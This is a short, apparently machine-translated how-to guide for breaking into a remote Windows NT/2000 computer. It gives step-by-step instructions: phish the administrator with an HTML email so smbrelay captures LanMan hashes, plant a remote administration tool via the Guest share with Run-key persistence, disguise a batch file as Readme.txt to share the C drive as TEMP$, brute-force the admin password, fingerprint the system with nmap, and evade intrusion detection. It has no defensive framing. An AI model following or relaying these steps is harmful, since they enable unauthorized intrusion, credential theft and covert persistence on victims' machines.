You will need
- program sniffer;
- utility smbrelay;
- utility for recovering passwords.
Send mail in HTML form to the administrator of the remote computer. In the letter place the link, for example, on figure, on a share of your computer. After the email client will open an email message will be sent to the request to open the file with a shared resource. During the connection of the shared resource when using capture utility smbrelay LanMan hash.
If the built-in account "Guest" is not blocked (respectively? the access to the registry is allowed), drop into a shared folder to share files, a program for remote administration. In the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run, create a parameter with the path to the program.
To implement remote administration tools, use the error Windows Explorer when handling file extensions. Create a batch file with name Readme.txt that will create a shared resource with full access to the C drive. Give it a name that won't arouse suspicion, for example, TEMP$. In this case the executable file will appear with a. txt extension, and in the same folder it will be the program for remote computer management.
To find out the administrator password of a computer running the operating system Windows NT/2000, use one of the utilities for recovering passwords: NAT, RedShadow, Brurus-AE or any other that can be find in free access in the Internet. Passwords you can sort and dictionary, and using brute force attacks. And the second way is the most effective.
When conducting some actions to obtain someone's password, remember that your actions can be monitored. So use special methods of bypass of systems of detection of attacks.
Before using software for the password on the remote computer learn how the operating system is installed. This can be done with the help of programs such as queso and nmap.